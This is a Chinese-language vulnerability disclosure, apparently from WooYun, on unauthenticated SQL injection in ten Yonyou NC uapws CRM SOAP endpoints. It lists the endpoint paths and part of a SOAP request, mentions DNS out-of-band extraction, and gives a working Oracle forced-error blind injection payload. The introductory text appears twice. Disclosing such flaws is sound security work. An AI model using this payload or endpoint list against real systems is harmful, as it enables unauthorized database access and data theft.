### 简要描述: wooyun搜了一下,没有人提,来一发。 ### 详细说明: 首先,该接口是无需权限访问的。 已http://**.**.**.**/bugs/wooyun-2010-0178322为例: **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl 均存在注入 [<img src="https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png" alt="04184.png"...
### 简要描述: wooyun搜了一下,没有人提,来一发。 ### 详细说明: 首先,该接口是无需权限访问的。 已http://**.**.**.**/bugs/wooyun-2010-0178322为例: **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl 均存在注入 [<img src="https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png" alt="04184.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png) [<img src="https://images.seebug.org/upload/201604/181843223b2d721edb1f8342ad0024764dd52366.png" alt="04185.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/181843223b2d721edb1f8342ad0024764dd52366.png) 无法报错注入的,因为我们填充的数据是随意填充的,也没有办法盲注,可以使用dns查询的方式。 ``` **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService <soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:icur="http://crm.bd.itf.nc/ICurrtypeExportToCrmService"> <soapenv:Header/> <soapenv:Body> <icur:exportCurrtypeToCrm> ``` [<img src="https://images.seebug.org/upload/201604/18192248060e4edf1f871b937306cdd6988c7d7a.png" alt="04186.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/18192248060e4edf1f871b937306cdd6988c7d7a.png) 还有一种情况是无法报错注入,也不能盲注,延时也不可以,可以使用强制报错盲注的办法: 'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT('USERENV','DB_NAME') from dual))=4) THEN 1 ELSE CAST('a' AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- 来猜解数据。 ### 漏洞证明: http://**.**.**.**:9090/
